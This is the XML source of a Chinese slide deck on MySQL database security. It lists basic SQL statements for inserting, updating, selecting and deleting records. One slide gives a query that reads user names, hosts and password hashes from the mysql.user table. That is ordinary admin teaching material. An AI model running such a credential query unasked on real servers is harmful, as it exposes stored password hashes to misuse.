                        </a:rPr>
                        <a:t>……</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>向数据表中插入新的记录</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4903556"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="809789">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>update </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>set </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1[,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2]  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>条件表达式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>修改、更新数据表中的记录</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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26652436"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="809789">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>……</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>条件表达式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>从数据表中查找符合条件的记录</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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3039177"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="622915">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>select * from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>显示当前数据库的表中的记录</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="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0403952"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="622915">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>delete from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>条件表达式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>在数据表中删除指定的记录</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </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83615701"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="521033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>delete from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="200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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>将当前数据库表中记录清空</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47356" marR="47356" marT="32473" marB="324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492197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83235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基本操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="1176655"/>
            <a:ext cx="10175240" cy="3385820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>查看用户及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mysql&gt;select user,host,password from mysql.user;</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新建用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216660" y="1791335"/>
            <a:ext cx="5857240" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222375" y="4039235"/>
            <a:ext cx="5790565" cy="257111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552">
      <a:dk1>
        <a:srgbClr val="5F5F5F"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="5F5F5F"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0CB692"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="358CC1"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A4C37B"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B49E4C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F73C51"/>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1300</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>240</Paragraphs>
  <Slides>27</Slides>
  <Notes>21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仿宋</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>A000120140530A99PPBG</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>MySQL 数据库安全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数据库安全</dc:title>
  <dc:creator>LHCan</dc:creator>
  <cp:lastModifiedBy>w10</cp:lastModifiedBy>
  <cp:revision>58</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-05T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-02T06:06:59Z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